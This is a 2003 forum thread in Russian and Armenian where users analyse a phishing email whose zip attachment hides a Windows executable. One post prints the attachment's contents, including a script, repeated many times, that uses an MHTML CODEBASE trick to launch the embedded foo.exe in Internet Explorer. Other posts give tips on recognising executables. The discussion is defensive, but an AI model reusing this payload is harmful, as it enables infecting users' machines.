![]() | |
| |||||||
| Home | Register | Blogs | FAQ | Members List | Calendar | Downloads | Arcade | Mark Forums Read |
| General Всякое |
![]() |
| | LinkBack | Thread Tools | Display Modes |
| | #1 |
| Moderator | смотрите что уже получаю второй день --- Hello there, I would like to inform you about important information regarding your email address. This email address will be expiring. Please read attachment for details. --- Best regards, Administrator fdqftckt ---- А вот это хедерс так сказать ---- Return-Path: <admin@freenet.am> Received: from styx.aic.net (styx.aic.net [195.250.64.68]) by gampr.freenet.am (8.12.9/8.12.9) with ESMTP id h728oRXC002023 for <mono@freenet.am>; Sat, 2 Aug 2003 13:50:27 +0500 (AMST) Received: from [217.113.7.194] (helo=localhost) by styx.aic.net with smtp (Exim 4.20) id 19is5b-000CWQ-9A for mono@freenet.am; Sat, 02 Aug 2003 13:50:14 +0500 From: admin@freenet.am To: Mono <mono@freenet.am> Reply-To: admin@freenet.am X-Mailer: The Bat! (v1.61) X-Priority: 2 (High) Subject: your account fdqftckt MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----------18AB777E094567B" Message-Id: <E19is5b-000CWQ-9A@styx.aic.net> Date: Sat, 02 Aug 2003 13:50:14 +0500 Content-Length: 26147 Status: ------ С атачед файлом message.zip. Koroche ya yego ne optkril. Chto skajete. 1. Virus li eto ?? 2. Hakeri ?? 3. ili je vpravdu konec Freenetu ??
__________________ --------------- Արատտայի ու Խալդեյի հովանավոր . |
| | |
| | #5 |
| Пожарник - огнеУтешитель | ne toko freenetovcam, sednya ya toje poluchil tochno to je pis'mo s takimi je header-ami na yahoo mail prosto delete ![]()
__________________ http://www.armino.am http://art007.photosight.ru "...как не верти, что то стало с глазами когда то загадочных женщин..." |
| | |
| | #6 |
| Moderator | Ребята я не так выразился. Мне интересно. Зип ли файл это? Если да то внутри может Ексешник есть или как?? либо же этот зип файл который использует баг в винзипе чтобы троянить через винзип. либо же это не зип файл а эксешник. Мне как то интересно что внутри
__________________ --------------- Արատտայի ու Խալդեյի հովանավոր . |
| | |
| | #7 |
| freelancer Join Date: Jun 2002 Location: the same place
Posts: 592
Rep Power: 7 Reputation:
10 | mda, curiousity killed the rabit ![]() kakim-to vieworom posmotri soderzhimoye - esli perviye dva simvola "MZ" - znachit exe ryadishkom budet navernoe i "This program cannot be run in DOS mode." |
| | |
| | #8 |
| Moderator | interesno odnako smotrite na vnutrennosti etogo fayla ne zrya je ya tak pilal curiositom =========== PK__ _____+E_/Y_@ѕ•I__•I_____message.htmlMIME-Version: 1.0 Content-Location:File://foo.exe Content-Transfer-Encoding: binary MZђ_________яя__ё_______@_________________________ __________Ђ_____є__ґ Н!ё_LН!This program cannot be run in DOS mode. $_______PE__L___ЁќЈ?________а___ + + + <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script><body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') } setTimeout("malware()",150) </script>PK____ _____+E_/Y_@ѕ•I__•I___________ _______message.htmlPK__________:___їI____
__________________ --------------- Արատտայի ու Խալդեյի հովանավոր . |
| | |
| | #9 |
| холостяк и точка. | Наверно БАТ файл с иконкой Зипа так "Мп3" рассылали типа, БАт файл а инонка ВинАмпа, никто даже не подумал подумать почему если даже в компе нету винама иконка такая?! ![]()
__________________ Сколько волка не корми, Медведь все равно круче!!! Идет по лесу турист.Вдруг ему навстречу выходит медведь,и между ними происходит следующий диалог. Медведь: - Ты кто? - Турист. - Врешь,турист - это я,а ты 'завтрак туриста'. |
| | |
| | #11 | |
| Banned Join Date: Oct 2002 Location: Brooklyn, New York
Posts: 3,760
Rep Power: 0 Reputation:
10 | i eshe zdes': http://securityresponse.symantec.com...mail.a@mm.html virus identificirovan!!! Quote:
| |
| | |
| | #12 |
| Грустно... | так как майл адреса admin@freenet.am не существует надо сразу это письмо подальше послать и хрен с аттачментом ![]()
__________________ http://аvitya.livejournal.com Хотели, как лучше, а получилось даже хуже... Лозунг шахматиста: На каждый шах - ответим матом! |
| | |
| | #13 |
| Administrator | я аттачменты всегда в NOTEPAD кидаю. header-ы очень просто распознать - экзешник это, скрипт, WinZIP или т.п. - просто попробуйте это на обычных файлах и заметите в начальных байтах общую инфу. А вот Арминко за такие действия отвечать должен, или нет ?
__________________ И повешенные могут качаться в неположенную сторону. /С.Е.Лец/ |
| | |
| | #14 |
| The Reloaded Join Date: Jan 2002 Location: behind the flesh and gelatinе of soft dull eyes
Posts: 3,176
Rep Power: 7 Reputation:
41 | я тоже получал такое письмо. в атаче нормальный зип. в зипе сидит html-файл, часть которого составляет экзешник. наверное если открыть в ie, что-нибудь да и случится...
__________________ Сайт армянских маньяков |
| | |
| | #15 | |
| The Reloaded Join Date: Jan 2002 Location: behind the flesh and gelatinе of soft dull eyes
Posts: 3,176
Rep Power: 7 Reputation:
41 | Quote:
__________________ Сайт армянских маньяков | |
| | |